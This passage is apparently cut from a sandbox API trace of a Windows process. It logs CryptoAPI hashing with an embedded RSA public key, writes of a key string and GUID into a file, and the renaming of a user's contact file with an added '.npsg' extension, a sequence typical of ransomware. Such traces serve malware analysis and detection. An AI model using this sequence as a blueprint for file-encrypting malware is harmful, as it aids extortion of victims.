KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.919] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.919] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0235.920] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0235.921] CryptHashData (hHash=0x33f0408, pbData=0x6962b0, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0235.921] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0235.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0235.921] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.921] GetLastError () returned 0x0 [0235.921] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.922] SetLastError (dwErrCode=0x0) [0235.922] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.923] GetLastError () returned 0x0 [0235.923] SetLastError (dwErrCode=0x0) [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.924] CryptDestroyHash (hHash=0x33f0408) returned 1 [0235.924] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0235.924] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0235.924] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0235.924] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0235.924] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x3b947f8 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b94a18 [0235.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0235.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0235.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0235.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a18 | out: hHeap=0x620000) returned 1 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff90 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff48 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33fff18 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0235.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x33b8188 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0235.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.925] GetCurrentThreadId () returned 0x5b4 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687e50 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0235.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.926] GetCurrentThreadId () returned 0x5b4 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0235.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff90 [0235.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0235.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff48 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffc0 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffa8 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0235.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400008 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff60 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff18 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff90 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x64dd08 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0235.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0235.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffa8 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0235.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6945f0 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0235.930] WriteFile (in: hFile=0x644, lpBuffer=0x3b7a060*, nNumberOfBytesToWrite=0x48f, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7a060*, lpNumberOfBytesWritten=0x39afb14*=0x48f, lpOverlapped=0x0) returned 1 [0235.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0235.930] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.930] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0235.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0235.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0235.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0235.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0235.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0235.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0235.931] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0235.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.931] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.931] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0235.931] CloseHandle (hObject=0x644) returned 1 [0235.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b947f8 [0235.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0235.932] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.npsg")) returned 1 [0235.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.933] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0235.934] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0235.935] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0235.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0235.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0235.946] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0235.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0235.946] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0235.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: 